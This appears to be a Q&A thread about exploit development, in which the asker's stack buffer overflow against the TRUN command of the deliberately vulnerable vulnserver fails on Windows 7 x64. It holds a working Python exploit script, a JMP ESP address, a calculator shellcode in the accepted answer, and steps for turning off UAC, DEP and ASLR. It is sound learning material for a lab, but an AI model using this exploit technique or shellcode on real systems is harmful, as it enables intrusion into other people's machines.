# Buffer Overflow Not working in Windows 7 x64?

Tags: buffer-overflow

I previously had exploited buffer overflows in Linux, have decent knowledge on how|why it happens, protections against it(ASLR,DEP).

Recently came to try it in windows, so first google search shows to exploit vulnserver's `TRUN` command, URL: https://github.com/stephenbradshaw/vulnserver based on my research, in windows you can't disable ASLR but can disable DEP for programs through `Data Execution Prevention` or https://community.ipswitch.com/s/article/Understanding-Data-Execution-Prevention-in-Windows-1307565976900

Before jumping to my script, below is the Immunity Debugger's parts after executing my exploit:

Portion of stack:

```
0260F9C8  41 41 41 41 41 41 41 41  AAAAAAAA
0260F9D0  41 41 41 41 41 41 41 41  AAAAAAAA
0260F9D8  F9 F9 60 02 FF F9 60 02  ùù`ÿù`
0260F9E0  90 90 90 90 90 90 90 90  
0260F9E8  90 90 90 90 90 90 90 90  
0260F9F0  EB 02 BA C7 93 BF 77 FF  ëºÇ“¿wÿ
0260F9F8  D2 CC E8 F3 FF FF FF 63  ÒÌèóÿÿÿc
0260FA00  61 6C 63 43 43 43 43 43  alcCCCCC
0260FA08  43 43 43 43 43 43 43 43  CCCCCCCC
0260FA10  43 43 43 43 43 43 43 43  CCCCCCCC
```

CPU Registers

```
EAX 00000114
ECX 004E6444
EDX 77BF93C7
EBX 00D0F200 ASCII "TRUN /.:/AAAAAAAAAAAAAAAA...
ESP 00D0F9D8
EBP 41414141
ESI 00000000
EDI CCD2FF77
EIP 77BF93C7
C 0  ES 002B 32bit 0(FFFFFFFF)
P 1  CS 0023 32bit 0(FFFFFFFF)
A 0  SS 002B 32bit 0(FFFFFFFF)
Z 1  DS 002B 32bit 0(FFFFFFFF)
S 0  FS 0053 32bit 7EFDA000(FFF)
T 0  GS 002B 32bit 0(FFFFFFFF)
D 0
O 0  LastErr ERROR_SUCCESS (00000000)
EFL 00010246 (NO,NB,E,BE,NS,PE,GE,LE)
ST0 empty g
ST1 empty g
ST2 empty g
ST3 empty g
ST4 empty g
ST5 empty g
ST6 empty g
ST7 empty g
           3 2 1 0      E S P U O Z D I
FST 0000  Cond 0 0 0 0  Err 0 0 0 0 0 0 0 0  (GT)
FCW 027F  Prec NEAR,53  Mask    1 1 1 1 1 1
```

Jump Register:

```
!mona find -s "\xff\xe4" -m essfunc.dll
Log data, item 11
Address=625011AF
Message=  0x625011af : "\xff\xe4" |  {PAGE_EXECUTE_READ} [essfunc.dll] ASLR: False, Rebase: False, SafeSEH: False, OS: False, v-1.0- (C:\Users\PenTest\Desktop\vulnserver-master\vulnserver-master\essfunc.dll)
```

Finaly My script:

```
#!/usr/bin/python

import socket
import os
import sys

host="192.168.1.18"
port=9999

buf = "\xeB\x02\xBA\xC7\x93\xBF\x77\xFF\xD2\xCC\xE8\xF3\xFF\xFF\xFF\x63\x61\x6C\x63";

buffer = "TRUN /.:/" + "A" * 2003 + "\xaf\x11\x50\x62" + "\x90" * 16 +  buf + "C" * (5060 - 2003 - 4 - 16 - len(buf))

expl = socket.socket(socket.AF_INET, socket.SOCK_STREAM)
expl.connect((host, port))
expl.send(buffer)
expl.close()
```

Vulnerable OS is windows 7 enterprise 64bit

is there a mistake I am making?

Answer (score 0, accepted):

Have to answer my own question for others who face the same problem as me

My shell code was for x86 bit architecture, below is for a All Windows calculator shellcode which worked for me.

```
"\x31\xdb\x64\x8b\x7b\x30\x8b\x7f"
"\x0c\x8b\x7f\x1c\x8b\x47\x08\x8b"
"\x77\x20\x8b\x3f\x80\x7e\x0c\x33"
"\x75\xf2\x89\xc7\x03\x78\x3c\x8b"
"\x57\x78\x01\xc2\x8b\x7a\x20\x01"
"\xc7\x89\xdd\x8b\x34\xaf\x01\xc6"
"\x45\x81\x3e\x43\x72\x65\x61\x75"
"\xf2\x81\x7e\x08\x6f\x63\x65\x73"
"\x75\xe9\x8b\x7a\x24\x01\xc7\x66"
"\x8b\x2c\x6f\x8b\x7a\x1c\x01\xc7"
"\x8b\x7c\xaf\xfc\x01\xc7\x89\xd9"
"\xb1\xff\x53\xe2\xfd\x68\x63\x61"
"\x6c\x63\x89\xe2\x52\x52\x53\x53"
"\x53\x53\x53\x53\x52\x53\xff\xd7"
```

Answer (score 1):

Below are some steps to prepare a Windows 7 64bit for the purpose of learning basic exploit development.

**Disable UAC**

Go to User Account Control Settings. Type in UAC, or go to the System and Security applet. Click on the “Change User Account Control Settings” link. To turn off UAC, move the slider to the Never notify position, and then click OK.

**Disable DEP**

1. Open command prompt as “Administrator”
2. Then, type this command :

   bcdedit.exe /set {current} nx AlwaysOff

**Disable ASLR**

1. Open RegEdit (Registry Editor)
2. Find this key :

   [HKEY_LOCAL_MACHINE\SYSTEM\CurrentControlSet\Control\Session Manager\Memory Management]
3. Create a new dword value as following

   “MoveImages”=dword:00000000 (without quote)
4. Reboot your system.